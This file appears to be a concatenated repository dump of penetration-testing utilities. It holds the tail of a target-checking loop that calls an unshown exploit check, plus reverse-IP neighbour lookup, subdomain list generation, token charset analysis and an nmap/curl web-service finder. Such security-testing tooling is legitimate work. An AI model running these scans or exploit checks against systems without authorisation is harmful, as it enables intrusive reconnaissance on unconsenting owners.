154 | puts "[Warning] - #{line.chomp} is not a valid URL - Ignored"
155 | end
156 | end
157 | end
158 | 
159 | targets.each do |target|
160 | begin
161 | puts
162 | puts "[+] Checking #{target.url}"
163 | 
164 | res = Typhoeus.get(target.url, request_params)
165 | 
166 | (target.in_scope_urls(res) << target.uri.join('welcome.png').to_s).each do |url|
167 | print " | #{url} - "
168 | 
169 | state = check_exploit(url)
170 | 
171 | puts state
172 | 
173 | break unless state == 'unknown'
174 | end
175 | rescue Interrupt
176 | puts 'Interrupted by user, jumping to next target'
177 | next
178 | rescue => e
179 | puts "[Error] - #{e.message}"
180 | next
181 | end
182 | end
183 | 
184 | 
185 | 
186 | 
--------------------------------------------------------------------------------
/neighbours.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | 
3 | #
4 | # This script takes a domain name or an IP address and retrieves its neighbours
5 | # Example: ./neighbours.rb randomstorm.com
6 | #
7 | # By: Erwan Le Rousseau (RandomStorm)
8 | #
9 | 
10 | require 'typhoeus'
11 | require 'nokogiri'
12 | 
13 | if address = ARGV[0]
14 | api_url = 'http://www.ipneighbour.com/'
15 | response = Typhoeus.post(api_url, :body => { 'domainName' => address })
16 | doc = Nokogiri::HTML(response.body)
17 | 
18 | doc.search('div#resultsContainer ul li a').each do |node|
19 | puts node.text.strip
20 | end
21 | else
22 | puts 'Usage: ./neighbours.rb domain_name_or_ip'
23 | end
24 | 
--------------------------------------------------------------------------------
/subdomains-creator.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | 
3 | #
4 | # By: Erwan Le Rousseau (RandomStorm)
5 | #
6 | 
7 | if domains_file = ARGV[0] and subdomains_file = ARGV[1]
8 | domains = File.readlines(domains_file)
9 | subdomains = File.readlines(subdomains_file)
10 | 
11 | subdomains.sort.each do |subdomain|
12 | domains.each do |domain|
13 | puts "#{subdomain.chomp}.#{domain.chomp}"
14 | end
15 | end
16 | 
17 | else
18 | puts 'Usage: ./subdomains-creator.rb domains-list subdomains-list'
19 | end
20 | 
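# For clarity, an illustrative run (the two input files and their contents are hypothetical):
#   domains-list contains:    example.com, example.org
#   subdomains-list contains: www, mail
#   Output:
#     mail.example.com
#     mail.example.org
#     www.example.com
#     www.example.org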
--------------------------------------------------------------------------------
/token_charset.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | 
3 | #
4 | ## By: Erwan Le Rousseau (RandomStorm)
5 | #
6 | ##
7 | # Performs an analysis of the tokens provided in the file
8 | # and outputs the possible charset for each character position
9 | ##
10 | #
11 | 
12 | require 'terminal-table'
13 | require 'optparse'
14 | 
15 | sort = false
16 | 
17 | parser = OptionParser.new("Usage: #{$0} [options] tokens-file", 20) do |opts|
18 | opts.on('-s', '--sort', 'Sort the characters found') do
19 | sort = true
20 | end
21 | end
22 | parser.parse!
23 | 
24 | if tokens_file = ARGV[0]
25 | 
26 | tokens = File.readlines(tokens_file).map &:chomp
27 | token_length = tokens[0].size
28 | charset = Array.new(token_length, [])
29 | tokens_processed = 0
30 | 
31 | charset.each_index { |index| charset[index] = [] }
32 | 
33 | tokens.each do |token|
34 | token_a = token.chars.to_a
35 | 
36 | (0..token_length-1).each do |index|
37 | token_char = token_a[index] || ''
38 | 
39 | charset[index] << token_char unless charset[index].include?(token_char)
40 | end
41 | tokens_processed += 1
42 | end
43 | 
44 | charset.each_index { |index| charset[index].sort! } if sort
45 | 
46 | # Converting columns to rows
47 | size = charset.max { |r1, r2| r1.size <=> r2.size }.size
48 | charset.each { |r| r[size - 1] ||= nil }
49 | rows = charset.transpose
50 | rows << :separator
51 | rows << [{ :value => "Tokens Processed: #{tokens_processed}", :colspan => token_length, :alignment => :center }]
52 | 
53 | # Table
54 | headings = (1..token_length).to_a
55 | style = { padding_left: 0, padding_right: 0 }
56 | table = Terminal::Table.new(headings: headings, rows: rows, title: 'Character Position', style: style)
57 | 
58 | puts table
59 | else
60 | puts parser
61 | end
62 | 
--------------------------------------------------------------------------------
/web-service-finder.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | #Gets the URLs that return a status 200 on ports 443 and 80 when given a list of IPs.
4 | #
5 | # Usage: ./web-service-finder.sh ips.txt
6 | #
7 | # By: Leon Teale (RandomStorm)
8 | #
9 | 
10 | 
11 | ## Check for correct usage
12 | if [ -z "$1" ];
13 | then
14 | echo ""
15 | echo "Please provide some IPs for the script"
16 | echo " Usage: ./web-service-finder.sh ips.txt"
17 | echo ""
18 | else
19 | echo ""
20 | for ip in `cat $1`;
21 | do echo "$ip";
22 | 
23 | #Perform nmap to only gather IPs that have port 443 open, else the script can hang.
24 | nmap $ip -p 443 -oN /dev/null | egrep open; done | grep -B 1 open > temp.txt; cat temp.txt | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' > ips443.txt;
25 | for ip in `cat ips443.txt | sort -u`; do
26 | 
27 | #Performs the last bit of the program using curl to grab the URL
28 | curl -k -sL -w "%{http_code} %{url_effective}\\n" "https://$ip"; done | grep "200 https"
29 | 
30 | for ip in `cat $1`;
31 | do echo "$ip";
32 | 
33 | #Perform nmap to only gather IPs that have port 80 open, else the script can hang.
34 | nmap $ip -p 80 -oN /dev/null | egrep open; done | grep -B 1 open > temp.txt; cat temp.txt | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' > ips80.txt;
35 | for ip in `cat ips80.txt | sort -u`; do
36 | 
37 | #Performs the last bit of the program using curl to grab the URL
38 | curl -k -sL -w "%{http_code} %{url_effective}\\n" "http://$ip"; done | grep "200 http"
39 | fi
40 | 
41 | 
42 | #clean up
43 | rm ips80.txt
44 | rm ips443.txt
45 | rm temp.txt
--------------------------------------------------------------------------------